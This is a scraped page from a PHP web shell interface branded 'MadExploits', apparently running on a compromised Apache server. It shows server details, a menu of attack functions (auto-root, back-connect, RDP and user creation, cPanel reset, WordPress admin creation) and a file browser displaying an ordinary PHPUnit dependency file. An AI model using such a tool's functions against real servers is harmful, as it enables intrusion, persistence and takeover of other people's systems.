Linux ip-172-31-33-47 5.4.0-1045-aws #47~18.04.1-Ubuntu SMP Tue Apr 13 15:58:14 UTC 2021 x86_64
Apache/2.4.29 (Ubuntu)
: 172.31.33.47 | : 216.73.216.109
Cant Read [ /etc/named.conf ]
7.4.20
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
boaz /
vendor /
sebastian /
code-unit /
src /
[ HOME SHELL ]
Name
Size
Permission
Action
exceptions
[ DIR ]
drwxrwxr-x
ClassMethodUnit.php
523
B
-rw-rw-r--
ClassUnit.php
505
B
-rw-rw-r--
CodeUnit.php
11.21
KB
-rw-rw-r--
CodeUnitCollection.php
1.68
KB
-rw-rw-r--
CodeUnitCollectionIterator.php
1.05
KB
-rw-rw-r--
FunctionUnit.php
514
B
-rw-rw-r--
InterfaceMethodUnit.php
531
B
-rw-rw-r--
InterfaceUnit.php
517
B
-rw-rw-r--
Mapper.php
11.91
KB
-rw-rw-r--
TraitMethodUnit.php
523
B
-rw-rw-r--
TraitUnit.php
505
B
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : CodeUnitCollectionIterator.php
<?php declare(strict_types=1); /* * This file is part of sebastian/code-unit. * * (c) Sebastian Bergmann <sebastian@phpunit.de> * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace SebastianBergmann\CodeUnit; use Iterator; final class CodeUnitCollectionIterator implements Iterator { /** * @psalm-var list<CodeUnit> */ private $codeUnits; /** * @var int */ private $position = 0; public function __construct(CodeUnitCollection $collection) { $this->codeUnits = $collection->asArray(); } public function rewind(): void { $this->position = 0; } public function valid(): bool { return isset($this->codeUnits[$this->position]); } public function key(): int { return $this->position; } public function current(): CodeUnit { return $this->codeUnits[$this->position]; } public function next(): void { $this->position++; } }
Close